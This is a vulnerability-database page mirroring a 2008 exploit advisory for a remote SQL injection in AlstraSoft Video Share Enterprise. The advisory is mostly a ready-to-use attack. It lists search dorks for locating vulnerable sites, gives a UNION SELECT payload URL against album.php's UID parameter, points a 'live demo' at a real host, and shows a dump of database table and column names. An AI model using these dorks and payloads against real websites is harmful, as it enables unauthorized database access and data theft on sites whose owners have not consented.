Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

alstrasoftvideo-sql.txt

🗓️ 17 Jul 2008 00:00:00Reported by Hussin XType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Remote SQL injection vulnerability exists in Video Share Enterprise by AlstraSoft.

Show more
Code
`|___________________________________________________|  
|  
| Video Share Enterprise (UID) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------------Hussin X----------------------|  
|  
| Author: Hussin X  
|  
| Home : www.tryag.cc/cc  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|  
|___________________________________________________  
| |  
|  
|  
| script : http://www.alstrasoft.com/videoshare.htm  
|  
| DorK : Powered By AlstraSoft Video Share Enterprise  
| DorK : inurl:"album.php?UID="  
| DorK : inurl:"view_picture.php?viewkey="  
|___________________________________________________|  
  
Exploit:   
  
  
www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--  
  
  
L!VE DEMO: :  
  
http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--  
  
________________________  
table_name : column_name  
  
  
adv:adv_status  
adv:adv_text  
adv:adv_name  
adv:adv_id  
audio:embed  
audio:be_rated  
audio:be_comment  
audio:filehome  
audio:rate  
audio:ratedby  
audio:fav_num  
audio:featured  
audio:com_num  
audio:viewnumber  
audio:vkey  
audio:country  
audio:location  
audio:record_date  
audio:adddate  
audio:addtime  
audio:type  
audio:duration  
audio:duration  
audio:flvdoname  
audio:vdoname  
audio:channel  
audio:keyword  
audio:featuredesc  
audio:UID  
audio:description  
audio:VID  
  
________________________  
  
  
  
____________________________( Greetz )____________________________  
|  
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke  
|   
| Iraqihack | FAHD | mos_chori | Silic0n   
|  
|_________________________________________________________________  
  
  
Im IRAQi  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
remote sql injectionalstrasoft video shareexploit demonstrationversion retrievalvulnerable scripts.
25
.json
Report